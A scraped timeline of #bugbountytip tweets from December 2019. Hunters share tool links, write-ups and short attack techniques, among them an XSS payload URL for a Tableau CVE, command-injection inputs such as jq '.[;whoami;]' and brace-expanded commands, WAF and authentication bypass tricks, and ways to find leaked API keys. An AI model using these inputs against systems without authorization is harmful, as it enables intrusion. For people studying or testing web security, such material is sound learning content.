noobSecurity
@noobsec_org


2019-12-16 07:17:12
6 https://t.co/7phSLNkWWL How we get $4000 in 5 minutes (Indonesian Language) #bugbounty #bugbountytip #bugbountytips #ittakesacrowd #togetherwehitharder
Laxmikant Bhumkar
@LuckyBhumkar


2019-12-16 00:09:51
0 Step by Step Bug Bounty by Nishant Saurav #bugbountytip https://t.co/0qTUn8I7Br
Elsadat âœȘ
@M0_SADAT


2019-12-15 00:38:20
3 I have submitted P1&P2 bugs more than 20 days and still no fix!! @santi_lopezz99 #bugbountytip PAY ME THEN DO THE DAMMN FIX! #bugbountylife #bugbounty #hacking #infosec
Max
@0xw2w


2019-12-14 23:01:10
2 @Hacker0x01 my.anotherdomain\@anotherdomain.com - 500 error my.anotherdomain^@anotherdomain.com - 302, accepted If you see that there are errors & your redirect not occurs but there are hints that this could work in particular cases, don't give up and continues fuzz! #bugbountytip #bugbounty
TheDelfX
@TheDelfX


2019-12-14 17:12:19
0 We are hackers. #hack #BugBounty #bugbountytip #software #hacking #hacker #hackerone https://t.co/29Q6mV643B
ghostlulz
@ghostlulz1337


2019-12-14 16:00:33
7 If you are serious about making a living doing bug bounties or working as a penetration tester you may want to get a copy of my latest book. 💰HUGE KNOWLEDGE DROP 💰 https://t.co/zJFRZjg5q2 #BugBounty #bugbountytip #bugbountytips #osint #infosec #redteam #hacking #pentest https://t.co/1TiV1v7Ipm
Nm Kannan 🇼🇳
@cybrsadist


2019-12-14 14:28:33
2 Useful video for n00b bug hunters => https://t.co/KbiKnOA4mg by @InsiderPhD #bugbountytip #bugbounty #infosec #penetrationtesting
bug bounty tips - Retweet
@BugbountytipsR


2019-12-14 14:09:20
0 Gr8 Blind SQLi tips BUGH/*$$$$*/UNTER - Insert comment b/w string, if respond remain same then it is sqli Profile @gerben_javado WriteuP https://t.co/65svYcig2u Wonder Why @gerben_javado is not writing more blogs? #bugbountytip #bugbountytips
Sudoka
@sudo_sudoka


2019-12-14 08:05:24
1 Tableau Server #unauthenticated XSS, CVE-2019-19719, just visit: http://example[.]com/en/embeddedAuthRedirect.html?auth=javascript:alert("XSS") It's also an Open Redirect. #ThreatIntel #infosec #bugbounty #bugbountytip Let's search on Shodan: https://t.co/c4zhLFo9KK
ᮂ
@pouyana1


2019-12-14 06:53:55
0 sometimes you can rely on 'Last-Modified' header to recognize software version, useful for finding available public exploits. #bugbountytips #bugbounty #bugbountytip
Shantanu Kulkarni
@shantanukul_


2019-12-14 06:35:01
7 6k hackerone disclosed reports at one place. https://t.co/3Dod4cwLHj #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsec #hacker #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip #hackerone #bugcrowd
ᮂ
@pouyana1


2019-12-13 18:17:29
1 Use x-forwarded-for to bypass WAF ip based limitations. #bugbountytip #bugbounty #bugbountytips
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-13 04:06:34
0 Cross Site Request Forgery: Techniques https://t.co/3N7hAtbbFP #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining
Selim Enes Karaduman
@Enesdex


2019-12-12 18:55:51
0 Always check for location.hash and location.href if these js codes are going into any sink without encoding it's Dom XSS E.g var hash = location.href .....innerHTML = hash #bugbountytip #bugbountytips #BugBounty
Pflash Punk
@PflashPunk


2019-12-12 18:48:25
0 I just published SSRF via FFmpeg HLS processing https://t.co/NISu4rr8Ik #bugbounty #bugbountytips #bugbountytip
Halil AHMAD
@Halilahmadd


2019-12-12 18:06:10
0 After a nice stored xss I prepared my report.I hope everything will be fine. #BugBounty #BugBountyTip #Hackerone @Hacker0x01 @GoogleVRP https://t.co/gEmljQEZd9
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍 揰鱹
@spyerror


2019-12-12 17:47:49
0 @Aksam funny, i think you are sleeping 😮 #BugBounty #BugBountyTip #WAF #infosec https://t.co/kExJ2STUK2
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-12 17:17:17
0 When the screens went black: How NotPetya taught Maersk to rely on resilience – not luck – to mitigate future cyber-attacks https://t.co/ECnt63vXqE #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil
YogoshaOfficial
@YogoshaOfficial


2019-12-12 14:15:14
3 [#bugbountytip] Found staging application that give you access to a privilege account with default credz, make sure to reuse this domain cookies to the main domain (prod), you can easily access as privileged user. @TnMch_ & Get ready for #yogoshachristmaschallenge next monday !
bug bounty tips - Retweet
@BugbountytipsR


2019-12-12 13:56:24
0 TIP: IF you DON'T like the RESPOND of SERVER INTERCEPT RESPOND CHANGE IT use BURP Changed Respond to Bypass Auththentication by John Simon Profile https://t.co/m6mB5kZ7lh WriteuP https://t.co/K1SbMWjDfq #bugbountytip #bugbountytips #writeup #hacking
Zero Xyele
@zeroxyele


2019-12-12 11:59:11
0 I released new tool for extracting api keys and secrets. https://t.co/YqD2Cac6iy #bugbounty #bugbountytip #bugbountytips #hackerone #hacker101 #bugcrowd https://t.co/jzAuhGY7b8
Sunil
@Sunilkande1137


2019-12-12 06:16:33
1 Recon Resources https://t.co/W7NLDe4PNJ https://t.co/xj3JvFgojf https://t.co/Gx4sx1ZoPM https://t.co/gFAXmz3t34 #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #ITsecurity #websecurity #appsec #hacker #security #Hackers #bugbountytips #bugbountytip
Mashoud1122
@mashoud1122


2019-12-12 04:17:01
1 Command exec in JQ cat file.json | jq .[;whoami;] returns error with command executed. #bugbountytip #bugbountytips #BugBounty #infosec #Security
Sunil
@Sunilkande1137


2019-12-12 01:25:04
4 6000 hackerone disclosed reports at one place. https://t.co/bxvXpnVitp #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsec #hacker #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip #hackerone
Vishnu Vardhan Gadupudi
@vishu10x00


2019-12-11 20:11:29
0 @idontkn85445458 @Dondata4 - As this is a post based you need to create a html csrf to trigger xss. - Just use burpsuite CSRF generator. - Save it as .html file. - Open the .html file it triggers XSSđŸŽ‰ïž #bugbountytip
Sunil
@Sunilkande1137


2019-12-11 19:13:07
3 6000 hackerone disclosed reports at one place. https://t.co/bxvXpnVitp #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsec #hacker #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip #hackerone
bug bounty tips - Retweet
@BugbountytipsR


2019-12-11 14:18:36
0 Use this link https://t.co/MWpV7kbFdO #bugbountytip #bugbountytips https://t.co/2suoUC9DK3
Tragger Osbourne🧐
@OsbourneTragger


2019-12-11 13:52:31
0 We all know @bishopfox is a team full of slayersBe sure to check out their latest write up where they identified 9 vulnerabilities in the Solishmed app #bugbounty #bugbountytip #bugbountytips #infosec #redteam #osint https://t.co/sNVecQJVRj
Vishnu Vardhan Gadupudi
@vishu10x00


2019-12-11 13:39:36
0 Escalate CRLF to RCE, I got this chain in my dreams⛷, i think it won't, at least not very often :P #bugbountytip CRLF -> X-HTTP-Method-overide:PUT -> Shell
bug bounty tips - Retweet
@BugbountytipsR


2019-12-11 12:56:47
1 XSS is like evil God who is everwhere Xss Hunter @AnasIsHere Xss Like Pro at https://t.co/a47iwf9j9f #bugbountytips #bugbounty #bugbountytip #hacking #writeup #xss
ghostlulz
@ghostlulz1337


2019-12-11 12:46:24
3 Everyone knows @bishopfox is a team full of slayers. Be sure to check out their latest write up where they identified 9 vulnerabilities in the Solishmed application. https://t.co/OtxduAPoSM #bugbounty #bugbountytip #bugbountytips #infosec #redteam #osint
D Ξ Ξ P Λ K ⚙
@Deepak_maxx


2019-12-11 12:43:40
0 If you got 10 stored XSS on the same application! How would you report it and why? I'm sure everyone will have their own opinions & experiences regarding this! #bugbounty #bugbountytips #bugbountytip
ZracheSs-AnasZ
@ZrariAnas


2019-12-11 08:12:03
0 If you didn’t already subscribe to @spaceraccoonsec blog posts! Go now, do it.. Come on, don’t question reason, just do it. Trust me, you’ll like it. I love you and you love me, then go do it. Subscribe, it’s free... No reason not to. Stop reading already!!??? #bugbountytip https://t.co/A7MeCBTLaA https://t.co/IGbatoBAAM
bug bounty tips - Retweet
@BugbountytipsR


2019-12-11 03:59:08
0 Beginners miss to chk source code for XSS and they never find out that it is easy #easy #bugbountytip #bugbountytips #hacking https://t.co/QM6gs3Ijpi
Sajjad Arshad
@sajjadium


2019-12-11 03:34:14
0 @USENIXSecurity @fransrosen @dawidczagan @orange_8361 @irsdl @garethheyes @NahamSec @ldionmarcil @nj_dav @jobertabma check out new ways of exploiting #WebCacheDeception using #PathConfusion techniques! #togetherwehitharder #bugbounty #bugbountytip #bugbountytips @Hacker0x01 @TheHackersNews
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-12-10 17:34:59
5 -List of some Penetration Testing Tools.pdf: https://t.co/sN2lkjt1Uh -In Plain Sight:1: Vulnhub Walkthrough.pdf: https://t.co/F2zf4eJK6n -A cheat-sheet for password crackers.pdf https://t.co/XQQxCJ99wQ #bugbountytip #redteam #PenTest #Hacking #cybersecurity #BugBounty #OSINT
Mourad
@SecuAudit


2019-12-10 15:56:36
0 i reported a critical bug in a 3rd party website company confirmed that this is critical even if is out of scope ,HackerOne Staff despite this insists that this is not critical and updated the severity from Critical to Medium #750138 #BugBounty #bugbountytip @Hacker0x01 😟
0day work
@0daywork


2019-12-10 15:53:28
1 #Bugbountytip Look for #API keys in the documentation or screenshots of blog posts. Sometimes those are *not* (entirely) redacted and still valid employee's credentials, giving you access to some juicy endpoints ;-) #Bugbounty #OWASP #ITSecurity https://t.co/V91tslWu3Y
Skyper đŸ’»
@SkypLabs


2019-12-10 00:33:05
2 Get the #ASN of a company: https://t.co/pi8II54BuN #Security #Hacking #BugBounty #BugBountyTip #BugBountyTips #Shodan
Alessandro Brucato
@_brucedh


2019-12-09 17:17:36
0 Any idea how to trigger an XSS into the body of a 301 redirect? @s0md3v @uraniumhacker @iamnoooob @brutelogic #bugbountytip https://t.co/dmW1q4hwTv
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-09 16:21:04
4 🏆🏆Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/4iR3cX3qyf
intigriti
@intigriti


2019-12-09 13:08:32
12 Did you know you can use OpenSSL for recon purposes? 🔒😏 Thanks for the #BugBountyTip, @michael1026h1! https://t.co/mRraH8cK2z
Mohammed Shine
@MohammedShine8


2019-12-09 11:44:16
6 Got stuck with spaces in command Injection? Use {} to eliminate spaces while using commands. Eg: {ping,127.0.0.1} {ip,addr} {ls,-al} #bugbounty #bugbountytip #infosec #commandinjection #cmdi #vapt #hacker
dark_warlord14
@dark_warlord14


2019-12-09 11:42:17
1 Opened a web page on Firefox and left to get coffee. Came back in a minute to find that sweet XSS popup by @knoxss_me just lying there. @brutelogic will amaze you every time. #bugbountytip Try @knoxss_me sand save time looking for XSS manually. https://t.co/4ppKTLDCeN
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-09 08:47:33
0 💰Keep Following Us 💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #hackerone https://t.co/DwvuqYv30k
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-09 08:43:54
0 True Story When Hacking the Neighbourhood WiFi — Tutorial Coming Soon 💰💰 Keep Following Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops https://t.co/P5VyKxUU81
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-09 08:41:28
0 HOF Comming Soon ! Keep Following ! Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil https://t.co/3GBqgjOgP4
robre
@_robre


2019-12-09 00:43:25
0 Create your own wordlists and be creative with them. If you’re just using seclists like everyone else, you will only find what everyone else is finding. #bugbountytip #bugbountytips
Rafin Rahman Chy
@rafinrahmanchy


2019-12-08 18:15:45
3 Information Gathering Methodologies *Social Engineering *Doxing *OSINT *Advanced Google Search/Google Hacking *DNS Enumeration *Internet Archive *Dumpster Diving #CyberSecurity #InfoSec #EthicalHacking #EthicalHacker #Hacking #Hacker #Pentesting #Recon #BugBounty #bugbountytip https://t.co/bVcvwskY8a
Tragger Osbourne
@OsbourneTragger


2019-12-08 15:06:59
0 firebase database It’s one of the easier win for #BugBoundy you can easily look for it on google using Site:.firebaseio.com/.json but google doesn’t give you results but if use bing you can get results Google knows the problem #togetherwehitharder #BugBounty #bugbountytip https://t.co/fMSc8J6lM1
Rafin Rahman Chy
@rafinrahmanchy


2019-12-08 15:01:12
11 The best guideline to become an Ethical Hacker I've ever read https://t.co/BMrOc4hH51 #CyberSecurity #InfoSec #infosecjobs #InfoSecurity #ITSecurity #EthicalHacking #EthicalHacker #Hacking #Hacker #Hackers #WhiteHat #BugBounty #bugbountytip #bugbountytips #Pentesting #Pentester
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-08 10:21:34
0 Ginp - A malware patchwork borrowing from Anubis Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting https://t.co/AzgReUIeLf
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-08 10:15:48
0 Breaking Mimblewimble’s Privacy Model Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/5gDbIPnmFH
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-08 10:07:55
2 Free Giveaway -- Free Programming Ebooks Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/7kp48r2kcA
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-08 10:00:40
3 Introducing Flan Scan: Cloudflare’s Lightweight Network Vulnerability Scanner -- Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 https://t.co/OSiQlEhTHi #BugBounty #BugBountyTip #bugbountytips
Terminal Jockey
@TerminalJockey


2019-12-08 04:03:53
1 I wrote a tool to help me learn bash! Simple script to do a little dns enum then crawls results for dirs found in the robots.txt file. Will be adding functionality, open to critique! https://t.co/PmlCbFedDE #bugbounty #infosec #ctf #bugbountytips #bugbountytip
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-12-07 23:54:02
2 i have finished building my github repository which talk about #OSINT.a very important repository for ethical hackers and and #BugBounty hunters and of course #OSINT lovers the repository for now contain 100 tips and it will get daily updates https://t.co/gNMSDGULS6 #bugbountytip
Samet ƞAHİN
@sametsahinnet


2019-12-07 18:14:21
2 Here is a blog and trick about : "Javascript File Inclusion via a Simple Link Injection" #bugbountytip : Even a Simple Link Injection can be very harmful. Depends on where it is. https://t.co/TcOpslYuvE https://t.co/ks5NJDD3ss
Zero Xyele
@zeroxyele


2019-12-07 12:28:31
0 I Got URLs https://t.co/K5qmVWfEs0 #hackerone #hacker101 #bugbounty #bugbountytips #bugbountytip #bugcrowd https://t.co/X7J2nk2dyz
xaeroborg
@xaeroborg


2019-12-07 12:09:05
0 resource #bugbountytips #bugbountytip https://t.co/kSxeWPYqWe
Hendrik
@hendrikvb


2019-12-07 07:11:49
0 #bugbountytip Add #corsy to your #CSRF recon, complement with #bolt, both by @s0md3v. #bugbounty #Pentesting
ghostlulz
@ghostlulz1337


2019-12-07 01:52:08
1 Most hunters freeze up when they get a piece of source code to analyze. Source code analysis can help you find a lot of bugs which are missed by black box style testing. Don't miss easy XSS. More info in my blog: https://t.co/Ke274Lvc9e #BugBounty #bugbountytips #bugbountytip https://t.co/E1XFw9H9Nc
ghostlulz
@ghostlulz1337


2019-12-06 20:40:05
10 If you're looking to make money bug bounty hunting you may want to get a copy of my book. Nothing is better than getting paid to do what you love! https://t.co/Z1FwTfiskG #BugBounty #bugbountytips #bugbountytip #infosec #appsec #osint #xss #pentest #redteam #cybersecurity https://t.co/CSTWdrUaD2
CyberTheReapeR☹
@CyberTheReapeR5


2019-12-06 20:39:18
1 what is xss payload for akamai waf bypass?? #hackerone #bugcrowd #infosec #bugbountytips #bugbountytip #xss #hacking
dos_kid
@kid_dos


2019-12-06 18:12:15
0 #bugbountytip Look twice before submitting reports especially for Information disclosures 😓
bugbountytip
@a_l_e_r_t_1_


2019-12-06 09:12:09
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby https://t.co/amLbKREucw
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-06 06:03:58
6 Type of Cyber Attacks 🩞 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/MZpyBpq6C4
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-12-06 03:06:03
6 -Windows Notes + Cheatsheet.pdf: https://t.co/lVxi7uImty -Windows Privilege Escalation Fundamentals.pdf: https://t.co/raueoqhVVH -Linux Notes + Cheatsheet.pdf: https://t.co/rrdCBWkbOT -Docker for Pentesters.pdf: https://t.co/Wl6qXHe6XI #bugbountytip #redteam #PenTest #Hacking
bayani elogada
@metamudkip


2019-12-06 02:14:16
0 If you're discouraged from joining unrewarding bug bounty programs, listen to @JessieJ: "We're paying with love tonight." #bugbounty #bugbountytip
fadetoblack
@hardweired


2019-12-05 19:59:55
0 If you're Testing for SSRF or blind XXE and it should takes time to be executed or Invalidated redirections to steal tokens : https://t.co/uHMg4rJD69 This tool is awesome to Test for those kind of bugs #bugbountytips #bugbountytip https://t.co/efC5pv0SZ4
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-12-05 18:43:44
0 Is their anything more beautiful than this in bug bounty #bugbounty #bugbountytip thanks @h1_sp1d3r @hakluke @stokfredrik @Rhynorater https://t.co/z6iavoWzgc
გოჩა ოჄრაძე (Gocha Okradze)
@GochaOqradze


2019-12-05 16:25:09
1 #bugbountytip Detect Unix Command injectio Payloads: https://t.co/Jz35dKi8KS Detect in response: regexp for burp suite. https://t.co/J0bS7ViC9C And 30 secod delay. It is all.
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-05 14:17:45
0 OnePlus #Breached Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/VVsLLbfvum
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-05 14:14:39
1 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/yJGb5KrEnU
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-05 14:14:21
0 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/mzFcIOkL8E
Rafin Rahman Chy
@rafinrahmanchy


2019-12-05 13:24:00
1 Facebook Bug Bounty Blogs/WriteUps : https://t.co/CKdsEXouCz https://t.co/rzoYk67VS6 https://t.co/xeQiLCoQbM https://t.co/7y70R706W1 https://t.co/E96wwBPfc6 https://t.co/hfAsZqb9tI https://t.co/ZxPANapI5l https://t.co/SJGiC0xChE https://t.co/d57e8Seq9m #BugBounty #bugbountytip https://t.co/L02NnprDQB
Anas Mahmood đŸ‡”đŸ‡°
@AnasIsHere


2019-12-05 12:28:29
6 #XSS like a Pro 😎 Just published another interesting writeup. Must read the full blog post Writeup: https://t.co/HlXk9esUv3 #BugBounty #BugBountyTip #Hacking #vulnerability
TvM
@tvmpt


2019-12-05 12:12:22
0 Quick and dirty way to import a big url list into burpsuite cat file | parallel -j 200 curl -L -o /dev/null {} -x 127.0.0.1:8080 -k -s #quickanddirtytip #bugbountytip #oneliner #bugbountytips
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-05 09:14:20
7 Cross Site Scripting Basics - #XSS https://t.co/0wdvBhdOHw Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-05 09:06:33
0 >> kali-undercover To Start #UNDERCOVER Mode in Kali 2019.4 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/F5IhdmmCzF
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-05 09:04:28
0 Update Your Kali and Get the Kali Undercover mode that looks like Windows OS ! Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops https://t.co/o7JrVLrhGx
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-05 09:01:35
0 PyXie Rat - Python Rat to Escalate Windows Permissions Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/eFwqj2ozDj
bugbountytip
@a_l_e_r_t_1_


2019-12-05 08:29:09
0 6 download for 50 + . GOOD HACKING !!! #bugbountytips #bugbountytip
Ajay Gautam
@evilboyajay


2019-12-05 07:06:04
4 I discovered a new kind of web application authentication bypass by accident while doing pentest and thought of sharing with you all <3 #infosecmatters #ethicalhacking #informationsecurity #cybersecurity #infosec #bugbountytip https://t.co/cFnTkaEFG2
ph0rensic
@ph0rensic


2019-12-05 01:15:20
0 I received $ 900 in a private program Hackerone! There is still time to hit the goal! I needed some arguments with the evaluator, always research what you're debating! https://t.co/TDQWkEfNMq #BugBounty #bugbountytip
გოჩა ოჄრაძე (Gocha Okradze)
@GochaOqradze


2019-12-05 00:30:46
0 #bugbountytip 99.99% of xss on public programs is dumpicates I got it
robre
@_robre


2019-12-04 21:06:25
1 @NathOnSecurity Hey little tip: open two windows of acunetix, double your income. #bugbountytip
@cr33pb0y
@theyiyibest


2019-12-04 20:05:09
0 Yay, I was awarded a 4 x $X00 bounty on @Hacker0x01! https://t.co/7vrkzfnbNA #TogetherWeHitHarder Recipe to this one: - Google Dorks - XSS reflected - Repeat first step. #bugbounty #bugbountyprogram #bugbountytip
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-12-04 18:58:36
0 Maximise Bug Bounty Scope - Gather Subdomains using Facebook Certificate Transparency https://t.co/AjSRBqt57p #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #hackerone
intigriti
@intigriti


2019-12-04 15:47:09
9 ⚠Open staging environments can lead to production account takeover ✔If they use a separate DB, but same JWT secret ✔If the username or e-mail address is used as identifier This is an excellent #BugBountyTip, thanks @kapytein! https://t.co/yZkBoDBO1d
Tragger Osbourne
@OsbourneTragger


2019-12-04 15:24:58
0 apps,I realized after reverse engineer,using tool like apktool,I was app to look at the AndroidManifest see all permissions, which often lead to stringxml where I would find content delivery ,login ID & pass,fB tokens,googleapi, #bugbountytips #bugbountytip #togetherwehitharder https://t.co/ZBq3acOAoI
გოჩა ოჄრაძე (Gocha Okradze)
@GochaOqradze


2019-12-04 12:19:07
1 #bugbountytip All in one for Bug Bounty Hunters and pentesters https://t.co/lRPVHMHKAo
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-12-04 00:37:38
3 -Pen-testing resources.pdf: https://t.co/eykvQfDT5g -Shellcode: Encrypting traffic.pdf: https://t.co/QMsNonNYPZ -huge list of pentest tookit.pdf: https://t.co/LM0XUQb2AI -Information Gathering with theHarvester.pdf: https://t.co/ZFWOVqotm6 #bugbountytip #Hacking #osint #redteam
Tragger Osbourne
@OsbourneTragger


2019-12-03 22:31:18
0 I just find a bug 🐜 on android app Using firebase , I use apktool Then I look for AndroidManifest.xml , I found firebase they , I look for address in string.xml , I found firebase database and api keys 🔑 #bugbountytip #bugbountytips #togetherwehitharder
ᮂ
@pouyana1


2019-12-03 21:55:59
3 Of course that James Kettle articles are something else. @albinowax https://t.co/nsTQZFfzMX #bugbountytip #infosecurity #Security #websecurity
haxor_raheem
@HaxorRaheem


2019-12-03 18:31:52
1 Anyone know how to inject a "href" payload in "h1" payload . @Bugcrowd @Hacker0x01 #bugbountytip
ghostlulz
@ghostlulz1337


2019-12-03 18:26:53
9 Exposed Log Files - https://t.co/Kft6p37wJM Exposed Firebase DB - https://t.co/WGzatNLO3C Exposed Github Passwords- https://t.co/sGVY9UloQQ Hacking GraphQL - https://t.co/Z4ZBm3bN82 XSS SVG - https://t.co/5k3dGwkaGA #BugBounty #bugbountytips #bugbountytip #infosec #osint
Sebastian Wieseler
@kickino


2019-12-03 15:30:20
2 Controversial #bugbountytip Schedule meetings with (defence) vendors and learn about their technics and technologies. Engage with them during product demos and establish a deeper understanding of their products. You can also use “blue” knowledge for “red” approaches or #bugbounty
ᮂ
@pouyana1


2019-12-03 09:42:57
0 bugbounty tips : find hidden HTTP headers and inject them, simple way to reach high risk bugs. #BugBounty #bugbountytips #bugbountytip
Shaurya Sharma
@ShauryaSharma05


2019-12-03 08:39:35
0 I just finished writing a blog and it's a great read for those who are trying their luck in bug bounty "Haven’t founded any bounties yet? Hunt for these vulnerabilities in web applications for a better bounty!" https://t.co/NRSjy03JN5 #bugbounty #hacking #bugbountytip
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-12-03 08:28:35
0 #bugbountytip find open prod marathon instances in shodan. - “X-Marathon-Leader” - “ssl:Redacted” “X-Marathon-Leader”
soon
@soon73564093


2019-12-03 06:32:33
1 Bingo xss <3 #bugbounty #bugbountytip https://t.co/d6FilP9MWs
Shoeb Patel
@0xCaptainFreak


2019-12-03 04:08:04
0 I constantly take time out of App Security and learn something else to keep things interesting. System Design and Competitive programming Interests me a lot. 1. https://t.co/SpMqOJ40sE 2. https://t.co/hhWuOhB85V #bugbountytips #bugbountytip
SerWaf
@serialwaffle


2019-12-03 02:24:57
0 Can someone explain to me how the directories work in #hackerone? If I understand correctly, all of the directories are fair game (if I stick to the in-scope items of course). Can I just pick a Co. and start hunting???#bugbounty #bugbountytip @Hacker0x01
Sanketh Sharath
@sharathsanketh


2019-12-03 02:18:19
2 Web application architecture:Principles, protocols and practices by Shklar & Rosen seems to be a great book! It's doing a world of good to me in making me understand how web apps work. Definitely recommended for those getting into bugbounty #bugbountytips #bugbounty #bugbountytip
sudo ls /usr/local/protected 🔮
@AbdulConsole


2019-12-02 23:50:45
0 You don’t want to look at the website from a bird’s eye view and find low hanging fruit i.e, security vulnerabilities without any serious impact. #bughunting #bugbountytip #bugbountytips
Avanish Pathak
@avanish46


